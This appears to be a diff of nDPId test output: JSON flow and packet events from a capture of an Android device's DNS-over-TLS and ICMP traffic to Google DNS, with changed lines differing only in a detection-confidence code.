+00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552825913,"flow_last_seen":1592552825928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552825928,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1592552825929,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552825929,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA0yAJAAEAGoGrAqAGfCAgICNrYA1WXsATBw\/3toIAQAVd7uAAAAQEICv\/\/zMVkDcpF"} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552825913,"flow_last_seen":1592552825929,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552825929,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552825913,"flow_last_seen":1592552825957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552825957,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552825913,"flow_last_seen":1592552825957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552825957,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} -01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552825913,"flow_last_seen":1592552825959,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552825959,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 
-01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552825913,"flow_last_seen":1592552825960,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552825960,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552825913,"flow_last_seen":1592552825929,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552825929,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":15,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552825913,"flow_last_seen":1592552825957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552825957,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552825913,"flow_last_seen":1592552825957,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552825957,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48044,"dst_port":853,"l4_proto":"tcp","ndpi": 
{"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} +01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552825913,"flow_last_seen":1592552825959,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552825959,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 
+01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":19,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552825913,"flow_last_seen":1592552825960,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552825960,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","src_port":56024,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552826036,"flow_last_seen":1592552826036,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1592552826036,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1592552826036,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552826036,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA80uBAAEAGmYjAqAGfCAgEBLuwA1WtLB4AAAAAAKAC\/\/8imQAAAgQFtAQCCAr\/\/8zgAAAAAAEDAwg="} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1592552826049,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1592552826049,"pkt":"ag\/ahpuQEBMx8Tl2CABFAAA8wHkAAHcGtO8ICAQEwKgBnwNVu7B94BEWrSweAaAS6yCziAAAAgQFZAQCCAq0eUC+\/\/\/M4AEDAwg="} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1592552826051,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1592552826051,"pkt":"EBMx8Tl2ag\/ahpuQCABFAAA00uFAAEAGmY\/AqAGfCAgEBLuwA1WtLB4BfeARF4AQAVfLywAAAQEICv\/\/zOS0eUC+"} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552826036,"flow_last_seen":1592552826051,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552826051,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552826036,"flow_last_seen":1592552826080,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552826080,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552826036,"flow_last_seen":1592552826081,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552826081,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":47,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1592552826036,"flow_last_seen":1592552826051,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1592552826051,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01017{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1592552826036,"flow_last_seen":1592552826080,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1572,"flow_avg_l4_payload_len":262,"midstream":0,"thread_ts_msec":1592552826080,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.google","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01418{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1592552826036,"flow_last_seen":1592552826081,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":2990,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1592552826081,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.4.4","src_port":48048,"dst_port":853,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"dns.google","server_names":"dns.google,*.dns.google.com,8888.google,dns.google.com,dns64.dns.google,2001:4860:4860::64,2001:4860:4860::6464,2001:4860:4860::8844,2001:4860:4860::8888,8.8.4.4,8.8.8.8","ja3":"2c776785ee603cc85d37df996bb90cc8","ja3s":"b44baa8a20901c5663b3a9664ba8a767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=dns.google","fingerprint":"5B:59:09:FC:7D:50:E6:F7:D1:08:8E:57:42:A2:D8:AE:1F:03:FF:EC"}} 00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552827426,"flow_last_seen":1592552827426,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1592552827426,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1592552827426,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1592552827426,"pkt":"EBMx8Tl2ag\/ahpuQCABFAABUl9BAAEAB0IHAqAGfCAgICAgA4JUAAgABem3sXgAAAADqxwcAAAAAABAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc="} 
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552827426,"flow_last_seen":1592552827426,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1592552827426,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.297900} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":81,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552827426,"flow_last_seen":1592552827426,"flow_idle_time":140000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":64,"flow_tot_l4_payload_len":64,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1592552827426,"l3_proto":"ip4","src_ip":"192.168.1.159","dst_ip":"8.8.8.8","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.297900} 00521{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1592552827440,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1592552827440,"pkt":"ag\/ahpuQEBMx8Tl2CABFoABUAAAAAHEBdrIICAgIwKgBnwAA6JUAAgABem3sXgAAAADqxwcAAAAAABAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc="} 
00522{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1592552828402,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1592552828402,"pkt":"EBMx8Tl2ag\/ahpuQCABFAABUl\/5AAEAB0FPAqAGfCAgICAgAgPEAAwABe23sXgAAAABJawcAAAAAABAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"googledns_android10.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592552871852,"flow_last_seen":1592552871852,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1592552871852,"l3_proto":"ip4","src_ip":"8.8.4.4","dst_ip":"192.168.1.159","src_port":853,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
